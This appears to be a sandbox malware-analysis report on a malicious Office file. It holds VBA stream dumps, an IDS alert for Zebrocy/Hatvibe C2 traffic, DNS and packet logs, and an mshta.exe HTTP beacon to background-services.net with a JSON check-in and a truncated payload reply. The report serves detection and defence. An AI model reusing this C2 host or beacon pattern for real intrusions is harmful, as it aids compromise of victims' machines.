                        Stream Path:VBA/__SRP_0
                        CLSID:
                        File Type:data
                        Stream Size:3529
                        Entropy:3.4180952316532593
                        Base64 Encoded:False
                        Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . .
                        Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                        Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 238
                        General
                        Stream Path:VBA/__SRP_1
                        CLSID:
                        File Type:data
                        Stream Size:238
                        Entropy:2.11560831315699
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
                        Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 3577
                        General
                        Stream Path:VBA/__SRP_2
                        CLSID:
                        File Type:data
                        Stream Size:3577
                        Entropy:3.725282825620112
                        Base64 Encoded:False
                        Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . / . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2f 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00
                        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 420
                        General
                        Stream Path:VBA/__SRP_3
                        CLSID:
                        File Type:data
                        Stream Size:420
                        Entropy:2.3674153773884705
                        Base64 Encoded:False
                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . .
                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                        Stream Path: VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
                        General
                        Stream Path:VBA/dir
                        CLSID:
                        File Type:VAX-order 68k Blit mpx/mux executable
                        Stream Size:522
                        Entropy:6.206794728607764
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! 8 h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . . . r . . . & O . f f i c
                        Data Raw:01 06 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 21 38 f2 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-13T21:33:51.571617+01002057742ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M112.58.15.15880192.168.2.2659240TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 13, 2025 21:33:03.449666023 CET49676443192.168.2.2652.182.143.209
                        Jan 13, 2025 21:33:05.855942011 CET49676443192.168.2.2652.182.143.209
                        Jan 13, 2025 21:33:09.199670076 CET49675443192.168.2.262.16.158.35
                        Jan 13, 2025 21:33:10.668406963 CET49676443192.168.2.2652.182.143.209
                        Jan 13, 2025 21:33:20.277906895 CET49676443192.168.2.2652.182.143.209
                        Jan 13, 2025 21:33:29.950927019 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:30.314644098 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:31.040318966 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:32.294071913 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:34.794061899 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:38.739130974 CET5922453192.168.2.26162.159.36.2
                        Jan 13, 2025 21:33:38.744335890 CET5359224162.159.36.2192.168.2.26
                        Jan 13, 2025 21:33:38.744604111 CET5922453192.168.2.26162.159.36.2
                        Jan 13, 2025 21:33:38.749490976 CET5359224162.159.36.2192.168.2.26
                        Jan 13, 2025 21:33:39.189436913 CET5922453192.168.2.26162.159.36.2
                        Jan 13, 2025 21:33:39.194377899 CET5359224162.159.36.2192.168.2.26
                        Jan 13, 2025 21:33:39.194466114 CET5922453192.168.2.26162.159.36.2
                        Jan 13, 2025 21:33:39.606570959 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:49.211407900 CET49677443192.168.2.26204.79.197.203
                        Jan 13, 2025 21:33:50.759020090 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:50.763972998 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:50.764064074 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:50.764348030 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:50.764658928 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:50.769119024 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:50.769455910 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:51.382364988 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:51.382438898 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:51.412499905 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:51.412691116 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:51.571616888 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:51.571641922 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:51.743153095 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:51.743221998 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:33:56.746691942 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:33:56.746779919 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.743422985 CET5924080192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.743894100 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.748586893 CET80592402.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:23.748776913 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:23.748915911 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.750430107 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.751080990 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:23.755341053 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:23.755930901 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:24.342899084 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:24.343216896 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:29.348165035 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:29.348325014 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:51.377315998 CET49691443192.168.2.262.23.242.162
                        Jan 13, 2025 21:34:51.382637024 CET443496912.23.242.162192.168.2.26
                        Jan 13, 2025 21:34:51.382699966 CET49691443192.168.2.262.23.242.162
                        Jan 13, 2025 21:34:51.393925905 CET49692443192.168.2.262.16.168.103
                        Jan 13, 2025 21:34:51.398854017 CET443496922.16.168.103192.168.2.26
                        Jan 13, 2025 21:34:51.398915052 CET49692443192.168.2.262.16.168.103
                        Jan 13, 2025 21:34:53.118654013 CET5924280192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.118956089 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.384414911 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384435892 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384445906 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384474993 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.384527922 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384556055 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384814978 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.384814978 CET49687443192.168.2.262.16.158.35
                        Jan 13, 2025 21:34:53.385823965 CET80592422.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.385839939 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.385926008 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.386176109 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.386368990 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:53.389873981 CET443496872.16.158.35192.168.2.26
                        Jan 13, 2025 21:34:53.390902996 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.391128063 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.983913898 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:53.984030962 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:34:58.987380981 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:34:58.987524986 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:16.532146931 CET49672443192.168.2.2620.198.118.190
                        Jan 13, 2025 21:35:16.532195091 CET4434967220.198.118.190192.168.2.26
                        Jan 13, 2025 21:35:17.167182922 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.167223930 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.167292118 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.168267012 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.168275118 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.987751007 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.991229057 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.999394894 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:17.999409914 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:17.999679089 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:18.054238081 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408096075 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408096075 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.408119917 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.408319950 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.455322981 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.585201979 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.585314989 CET4435924440.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:19.586030006 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.586030006 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:19.586236000 CET59244443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.196712017 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.196753979 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.196876049 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.197731972 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.197743893 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.980047941 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.980207920 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.982237101 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:20.982248068 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:20.982476950 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:21.036611080 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481851101 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481868029 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.481882095 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.482055902 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.523334026 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652265072 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652333975 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.652399063 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.652530909 CET59246443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:22.652549982 CET4435924640.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:22.954543114 CET5924380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.954955101 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.959803104 CET80592432.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.959872007 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.960020065 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.960267067 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.960386038 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:22.965137959 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:22.965248108 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:23.582191944 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:23.587306976 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:28.587837934 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:28.588074923 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:28.908420086 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.908468962 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:28.908525944 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.909336090 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:28.909352064 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.727875948 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.728184938 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:29.730272055 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:29.730283022 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.730528116 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:29.772697926 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989384890 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989438057 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:30.989448071 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:30.989557981 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.031335115 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.163924932 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.163999081 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.164705038 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.164705038 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:31.164746046 CET4435924940.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:31.164777994 CET59249443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:40.648314953 CET5924880192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:40.653347015 CET80592482.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:41.549266100 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.549401999 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:41.549627066 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.550575018 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:41.550611019 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.625166893 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.625263929 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:42.627372026 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:42.627403021 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.627643108 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:42.679177999 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858726978 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858793020 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.858819008 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:43.858927965 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:43.899341106 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036482096 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036708117 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:44.036813021 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:44.036981106 CET59251443192.168.2.2640.115.3.253
                        Jan 13, 2025 21:35:44.036998034 CET4435925140.115.3.253192.168.2.26
                        Jan 13, 2025 21:35:49.100621939 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105525970 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.105627060 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105818987 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.105992079 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:49.110553026 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.110718012 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.730720043 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:49.730950117 CET5925380192.168.2.262.58.15.158
                        Jan 13, 2025 21:35:54.734040976 CET80592532.58.15.158192.168.2.26
                        Jan 13, 2025 21:35:54.734112978 CET5925380192.168.2.262.58.15.158

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 13, 2025 21:33:21.878992081 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:22.637222052 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:23.387221098 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:38.738708019 CET5355137162.159.36.2192.168.2.26
                        Jan 13, 2025 21:33:39.194685936 CET5774653192.168.2.261.1.1.1
                        Jan 13, 2025 21:33:39.202173948 CET53577461.1.1.1192.168.2.26
                        Jan 13, 2025 21:33:46.182470083 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:46.919135094 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:47.669538021 CET137137192.168.2.26192.168.2.255
                        Jan 13, 2025 21:33:50.695576906 CET5774653192.168.2.261.1.1.1
                        Jan 13, 2025 21:33:50.730290890 CET53577461.1.1.1192.168.2.26
                        Jan 13, 2025 21:34:05.741970062 CET138138192.168.2.26192.168.2.255

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 13, 2025 21:33:39.194685936 CET192.168.2.261.1.1.10x6bbdStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        Jan 13, 2025 21:33:50.695576906 CET192.168.2.261.1.1.10x9819Standard query (0)background-services.netA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:06.987019062 CET1.1.1.1192.168.2.260x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                        Jan 13, 2025 21:33:39.202173948 CET1.1.1.1192.168.2.260x6bbdName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        Jan 13, 2025 21:33:50.730290890 CET1.1.1.1192.168.2.260x9819No error (0)background-services.net2.58.15.158A (IP address)IN (0x0001)false

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.26592402.58.15.158801460C:\Windows\System32\mshta.exe
                        TimestampBytes transferredDirectionData
                        Jan 13, 2025 21:33:50.764348030 CET269OUTPUT /setup.php HTTP/1.1
                        Accept: */*
                        Content-type: application/json
                        User-Agent: 061544 user
                        Accept-Language: en-ch
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        Host: background-services.net
                        Content-Length: 84
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Jan 13, 2025 21:33:50.764658928 CET84OUTData Raw: 7b 22 6f 6b 61 6b 73 6f 66 6b 61 69 22 3a 22 70 69 7a 66 67 67 4c 50 77 71 31 4f 32 51 77 66 34 58 34 76 46 63 67 32 22 2c 22 78 6f 73 6b 64 6b 73 69 6f 73 22 3a 22 30 36 31 35 34 34 20 47 61 6e 6a 69 22 2c 22 71 6f 61 6b 73 66 6a 69 61 6d 22 3a
                        Data Ascii: {"okaksofkai":"pizfggLPwq1O2Qwf4X4vFcg2","xoskdksios":"061544 user","qoaksfjiam":1}
                        Jan 13, 2025 21:33:51.382364988 CET1181INHTTP/1.1 200 OK
                        Date: Mon, 13 Jan 2025 20:33:51 GMT
                        Server: Apache
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Content-Length: 945
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=utf-8
                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 0b 6e e3 3a 0c bc 92 44 52 94 75 9c c4 9f 3d c0 de 1f 78 33 94 a5 38 69 ba 68 83 57 a3 81 ad 0f 39 1c 7e ff 6e 65 db 0e dd f5 f8 63 7f 8e ed af 1d be 4b b2 52 a5 8a 1f 55 24 15 f1 52 b5 16 df bc 60 67 c7 d7 52 2d 6d e9 e6 e6 87 9f 3b be 57 93 dd 2b 76 cd 8a af 3e 57 ab 9a d4 56 cc b3 57 dc ce 21 67 11 81 cc 84 af 5d 44 9a 2c 9a f0 bb 7b 73 93 a4 9b 24 11 57 48 37 c8 10 48 83 1e bf 03 0c b4 9a 43 e3 0e bd 86 d3 81 d6 17 85 b4 52 8a 99 6b 56 97 c5 17 69 3c 9b da 6f ec 49 d0 ee 19 72 b3 11 3f ac c1 fb d2 f1 f4 95 27 c9 de e5 e1 14 25 97 9a 0c 92 c1 40 a3 46 de d1 0c 6d e0 08 67 de ca 2d b4 01 f7 70 f2 d4 9f 5a 0d 74 fd fe f9 7e 87 76 f5 a5 0a 8c 58 4c 21 03 12 c8 a0 b8 f3 f7 6e 5b f0 46 6c eb 5b 34 2b 5c d0 f8 9c c8 9f 6d 7e 65 ef a2 3b f8 26 62 78 e5 95 f7 f7 be a8 aa 02 ac c0 e7 b9 eb 83 2f d3 6f bc 10 e7 29 0f 28 fc 21 61 b0 dd 5e b9 9d 9e c9 c3 3e 9e 9f 38 ba 35 f3 8b 6c 42 77 03 33 d0 47 16 35 f1 01 8f 49 60 bb 2d 44 02 9e 73 55 d7 60 7c b0 9b c1 6e 03 97 b9 73 [TRUNCATED]
